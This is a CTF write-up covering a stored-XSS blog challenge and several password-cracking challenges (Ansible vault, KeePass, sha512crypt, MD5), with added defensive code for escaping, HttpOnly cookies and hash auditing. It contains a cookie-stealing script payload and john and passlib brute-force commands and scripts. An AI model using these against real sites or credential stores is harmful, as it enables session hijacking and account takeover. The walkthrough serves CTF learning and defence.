Punk Security - DevSecOps Birthday CTF

Web

XSS - Easy

Challenge Description

We've built a new blog app!

Can you get the flag from the admin user? He's logged on right now

Solution

I don't have access to the instance anymore since the CTF has been paused, but I will try to explain the steps.

After looking around we find a comment box that supports markdown, which we can exploit for stored XSS. We need the admin's cookie to get the admin's session. I made the following script:

<script>
// Runs in the browser of whoever loads the comments page and posts that visitor's cookie back as a new comment
fetch('http://blog.com:5000/new-comment', {
    method: 'POST',
    headers: {
      'Cookie': document.cookie,
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: new URLSearchParams({
        'name': 'cookie grab',
        'comment': document.cookie
    })
})
</script>

Post a comment containing this script. Because the comment is stored, the script runs automatically whenever someone loads the page with the comments. It sends a POST request that looks like that person submitting a comment, with their cookie as the comment text. There will be a lot of cookies, so you might have to try a few different ones; for me the second comment cookie worked, and when pressing the admin button in the top left of the page you are greeted with the flag.
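To show the defensive side of this challenge, here is an added Python example that is not part of the writeup or of the challenge app. It demonstrates the two fixes that would have stopped this attack: HTML-escaping comment text before it is placed in the page, so a comment like the one above is displayed as text rather than executed, and issuing the session cookie with HttpOnly so document.cookie cannot read it. The sample comment, the cookie name `session` and all helper names are my own assumptions; a real markdown renderer would need to be configured to escape or strip raw HTML to the same effect.

```python
import html
import re

# Constructed sample comment shaped like the challenge payload: a <script> tag in the comment body.
SAMPLE_COMMENT = "<script>fetch('http://blog.com:5000/new-comment', {method: 'POST'})</script> nice post!"

# An opening <script> tag is what the browser would execute.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_comment_unsafe(comment: str) -> str:
    """The vulnerable pattern: user text is concatenated into the page as markup."""
    return '<div class="comment">%s</div>' % comment


def render_comment_safe(comment: str) -> str:
    """Hardened pattern: HTML-escape user text so tags are shown, not executed."""
    return '<div class="comment">%s</div>' % html.escape(comment, quote=True)


def has_live_script_tag(rendered: str) -> bool:
    """Detection helper (for tests or a log scanner): is a <script> tag left in the output?"""
    return SCRIPT_TAG.search(rendered) is not None


def session_set_cookie(value: str) -> str:
    """Set-Cookie line for the session. HttpOnly keeps it out of document.cookie,
    Secure restricts it to HTTPS, SameSite=Lax limits cross-site sending."""
    return "session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % value


def missing_httponly(set_cookie_line: str) -> bool:
    """Audit check: True when a Set-Cookie line lacks the HttpOnly attribute."""
    attributes = {part.strip().lower() for part in set_cookie_line.split(";")[1:]}
    return "httponly" not in attributes


if __name__ == "__main__":
    print("unsafe :", render_comment_unsafe(SAMPLE_COMMENT))
    print("safe   :", render_comment_safe(SAMPLE_COMMENT))
    print("cookie :", session_set_cookie("constructed-session-id"))
    print("weak cookie flagged:", missing_httponly("session=constructed-session-id; Path=/"))
```

Escaping on output is the fix for the comment box itself; the HttpOnly flag is defence in depth, because even a script that does run then has nothing useful to read from document.cookie. The Secure attribute assumes the blog is served over HTTPS, which the challenge instance (plain http on port 5000) was not.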

Password Cracking

Password Cracking - 1

Challenge Description

The flag is the password for this vault.

supersecrets.yml

Solution

John the Ripper ships a tool that converts Ansible vault files into john-compatible hashes, but it isn't a standard command; you need to run the Python file directly. Use the command below, adjusting the path to wherever your john source files are placed:

python /usr/share/john/ansible2john.py supersecrets.yml > ansiblehash.txt

If you can't find the john files, you can download ansible2john.py from here.

This creates a john-compatible hash from the Ansible vault file and writes it to ansiblehash.txt.

Now we can run john to brute-force the password:

john --wordlist=new_rockyou.txt ansiblehash.txt

The new_rockyou.txt wordlist is from the Password Cracking 2 writeup, check it out.

When john finishes, it should have found the password zebracrossing.
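What ansible2john extracts, and what john then tests per candidate, is the vault's HMAC. The following added Python example (mine, not the writeup's and not Ansible's or john's code) parses the $ANSIBLE_VAULT;1.1;AES256 envelope, derives the keys with PBKDF2-HMAC-SHA256 exactly as Ansible's AES256 cipher does (10,000 iterations, 80 bytes: AES key, HMAC key, IV) and confirms a passphrase by recomputing the HMAC over the ciphertext, without ever decrypting. That is enough to check whether a vault's passphrase appears in a weak-password list. The sample vault is constructed inside the block with a fixed salt and placeholder ciphertext bytes (no real AES-CTR payload, which this check never needs); the function names are my own.

```python
import binascii
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

VAULT_HEADER = "$ANSIBLE_VAULT;1.1;AES256"
PBKDF2_ITERATIONS = 10000  # iteration count of Ansible's AES256 vault cipher


def derive_keys(password: str, salt: bytes) -> Tuple[bytes, bytes, bytes]:
    """PBKDF2-HMAC-SHA256 -> 80 bytes: 32-byte AES key, 32-byte HMAC key, 16-byte IV."""
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS, dklen=80)
    return derived[:32], derived[32:64], derived[64:80]


def parse_vault(vault_text: str) -> Tuple[bytes, bytes, bytes]:
    """Return (salt, hmac_digest, ciphertext) from an AES256 vault file.
    The body is hex; once decoded it holds three more hex fields separated by newlines."""
    lines = vault_text.strip().splitlines()
    fields = lines[0].split(";")  # 1.2 files add a vault id as a fourth field
    if fields[0] != "$ANSIBLE_VAULT" or len(fields) < 3 or fields[2] != "AES256":
        raise ValueError("not an $ANSIBLE_VAULT AES256 file")
    body = binascii.unhexlify("".join(lines[1:]))
    salt_hex, hmac_hex, ciphertext_hex = body.split(b"\n", 2)
    return (binascii.unhexlify(salt_hex),
            binascii.unhexlify(hmac_hex),
            binascii.unhexlify(ciphertext_hex))


def vault_password_matches(vault_text: str, candidate: str) -> bool:
    """Check a candidate passphrase using only the HMAC: the right HMAC key
    reproduces the stored tag over the ciphertext. No decryption is needed,
    which is why a vault 'hash' can be tested like any other."""
    salt, stored_hmac, ciphertext = parse_vault(vault_text)
    _, hmac_key, _ = derive_keys(candidate, salt)
    computed = hmac.new(hmac_key, ciphertext, hashlib.sha256).digest()
    return hmac.compare_digest(computed, stored_hmac)


def build_sample_vault(password: str, salt: bytes, ciphertext: bytes) -> str:
    """Constructed sample for this demo: correct envelope and HMAC, but the
    ciphertext is placeholder bytes rather than a real AES-CTR payload."""
    _, hmac_key, _ = derive_keys(password, salt)
    tag = hmac.new(hmac_key, ciphertext, hashlib.sha256).hexdigest().encode()
    inner = b"\n".join([binascii.hexlify(salt), tag, binascii.hexlify(ciphertext)])
    outer = binascii.hexlify(inner).decode()
    wrapped = [outer[i:i + 80] for i in range(0, len(outer), 80)]  # 80-column lines like ansible-vault
    return "\n".join([VAULT_HEADER] + wrapped) + "\n"


# Constructed sample vault: fixed salt and placeholder ciphertext so the run is reproducible.
SAMPLE_VAULT = build_sample_vault("zebracrossing", bytes(range(32)), b"placeholder ciphertext bytes")


def audit_vault_against_wordlist(vault_text: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first passphrase in the list that opens the vault, or None if none does."""
    for candidate in wordlist:
        if vault_password_matches(vault_text, candidate):
            return candidate
    return None


if __name__ == "__main__":
    print(audit_vault_against_wordlist(SAMPLE_VAULT, ["password", "zebracrossing"]))
```

Each candidate costs a full 10,000-iteration PBKDF2 run, which is the whole point of the KDF and why the wordlist used against the vault should be as small and targeted as possible; john does the same work, just much faster.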

Password Cracking - 2

Challenge Description

The flag is the password for this vault.

keepass.kdbx

Solution

For this challenge we will use John the Ripper to crack the password hash. First we need to obtain the hash: keepass2john turns the KeePass database into a john-compatible hash. We use the command below.

keepass2john keepass.kdbx > keepasshash.txt

This extracts the hash from keepass.kdbx and writes it to the keepasshash.txt file.

Now we can brute-force the password with john using the command below:

john --wordlist=/usr/share/wordlists/rockyou.txt keepasshash.txt

Replace the wordlist path if yours is placed somewhere else.

This is going to take a lot of time. But once we have cracked one password challenge, we can crack the others faster.


When john has found the password we can see that it's zebracakes, and that's the flag.

Note that the password contained "zebra", which is also the logo of Punk Security. This suggests that we can make a new password list containing only the entries in rockyou.txt that include "zebra". To build this list I wrote a quick Python script:

# Read rockyou.txt, skipping bytes that aren't valid text
with open("rockyou.txt", "r", errors="ignore") as f:
    passwords = [pw.strip() for pw in f]

# Keep only entries that contain "zebra", case-insensitively
new_passwords = []

for password in passwords:
    if "zebra" in password.lower():
        new_passwords.append(password)

# Write the filtered list, one entry per line
with open("new_rockyou.txt", "w") as f:
    f.write("\n".join(new_passwords))

This creates a new_rockyou.txt file with only the entries from the original rockyou.txt that include "zebra". You can also download it here if you want to.

Password Cracking - 4

Challenge Description

$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0

The flag is the password corresponding with this hash.

Solution

For this challenge I first needed to find out what type of hash this was, so I used hashes.com/en/tools/hash_identifier to identify it. It came back as sha512crypt ($6$), so I googled that and found this page, which explained it quite well. The hash can be split into three parts: the hash method, the salt and the hash itself. I wrote a Python script to crack the password using Python's passlib library (passlib.hash). I split the string into the salt and the hash, because the method identifier is not needed once we know we have to use sha512. Also, I didn't know how many rounds the hash went through, so just to be sure I made the script try from 1,000 to 10,000 rounds.

Read the Password Cracking 2 writeup to see how new_rockyou.txt was made.

from passlib.hash import sha512_crypt

salt = "XM4TZ5vb6W/0SjIl"
hashed_flag = "PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"
full_hash = "$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"

# new_rockyou.txt is the "zebra"-only wordlist from the Password Cracking 2 writeup
with open("new_rockyou.txt", "r", errors="ignore") as f:
    passwords = [pw.strip() for pw in f]

# Try 1000, 2000, ..., 10000 rounds. A $6$ hash with no "rounds=" field was made with
# the default of 5000 rounds, so only that iteration can produce a string equal to full_hash.
for n in range(1, 11):
    n = n * 1000
    print("Rounds:", n)
    for password in passwords:
        h = sha512_crypt.using(salt=salt, rounds=n).hash(password)
        if h == full_hash:
            print(password)
            raise SystemExit(0)

When run, the script goes through the wordlist, hashing each entry with the salt. If a generated hash matches the full hash, it prints the password and exits. From the run we see that the number of rounds is 5,000 and the password is zebrasrule.

Password Cracking - 5

Challenge Description

fd217a229b674ae4bcb82a0bb4751e11

The flag is the password corresponding with this hash.

Solution

This one was pretty easy. I usually run hashes through hashes.com/en/tools/hash_identifier to identify them, and right away it sees that it's an MD5 hash and shows the password: 16drunkzebras.
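The two identification steps above (splitting the $6$ string into method, salt and hash in Password Cracking 4, and recognising a bare 32-character hex digest as MD5 in Password Cracking 5) can be done offline. The following Python example is added here and is my own code, not the writeup's and not the hashes.com identifier: it parses modular-crypt strings including an optional rounds= field, applies the SHA-crypt default of 5,000 rounds when that field is absent (which is why the loop in the previous writeup only matched at 5,000), classifies bare hex digests by length, and shows why an unsalted MD5 is found instantly by hashing a candidate list with hashlib. The two hashes are taken from this page; the helper names and the sample candidate list are my own assumptions.

```python
import hashlib
import re
from typing import Dict, Iterable, Optional

# Modular-crypt identifiers most often met in /etc/shadow.
CRYPT_SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
DEFAULT_SHACRYPT_ROUNDS = 5000  # sha256crypt/sha512crypt omit "rounds=" when the default is used

# Bare hex digests cannot be told apart by content, only by length.
HEX_LENGTHS = {
    32: "128-bit digest (MD5/NTLM length, unsalted)",
    40: "160-bit digest (SHA-1 length, unsalted)",
    64: "256-bit digest (SHA-256 length, unsalted)",
    128: "512-bit digest (SHA-512 length, unsalted)",
}

# Hashes from the challenge descriptions on this page, used here only as parser input.
SHA512CRYPT_HASH = "$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"
MD5_HASH = "fd217a229b674ae4bcb82a0bb4751e11"


def parse_crypt_hash(value: str) -> Dict[str, object]:
    """Split a $id$[rounds=N$]salt$digest string into its fields."""
    if not value.startswith("$"):
        raise ValueError("not a modular-crypt string")
    parts = value.split("$")[1:]  # drop the empty element before the leading '$'
    scheme = CRYPT_SCHEMES.get(parts[0], "unknown($%s$)" % parts[0])
    rounds = DEFAULT_SHACRYPT_ROUNDS if parts[0] in ("5", "6") else None
    if len(parts) == 4 and parts[1].startswith("rounds="):
        rounds = int(parts[1].split("=", 1)[1])
        del parts[1]
    if len(parts) != 3:
        raise ValueError("unexpected number of fields")
    return {"scheme": scheme, "rounds": rounds, "salt": parts[1], "digest": parts[2]}


def identify(value: str) -> str:
    """Describe a hash string: salted crypt format, bare digest, or unknown."""
    if value.startswith("$"):
        info = parse_crypt_hash(value)
        return "%s, rounds=%s, salt=%s" % (info["scheme"], info["rounds"], info["salt"])
    if re.fullmatch(r"[0-9a-fA-F]+", value) and len(value) in HEX_LENGTHS:
        return HEX_LENGTHS[len(value)]
    return "unrecognised"


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def find_md5_preimage(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Unsalted MD5 costs one fast hash per candidate, which is why such hashes
    are resolved instantly from precomputed lists; salted slow schemes are not."""
    digest = digest.lower()
    for candidate in candidates:
        if md5_hex(candidate) == digest:
            return candidate
    return None


if __name__ == "__main__":
    print(identify(SHA512CRYPT_HASH))
    print(identify(MD5_HASH))
    # Constructed candidate list built from the passwords recovered in these writeups.
    print(find_md5_preimage(MD5_HASH, ["zebracrossing", "zebracakes", "zebrasrule", "16drunkzebras"]))
```

For a defender the useful output is the first two lines: a system storing credentials as bare MD5 should be flagged, while a sha512crypt hash at the default 5,000 rounds is acceptable but is much better served by a higher rounds= value or a memory-hard scheme.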
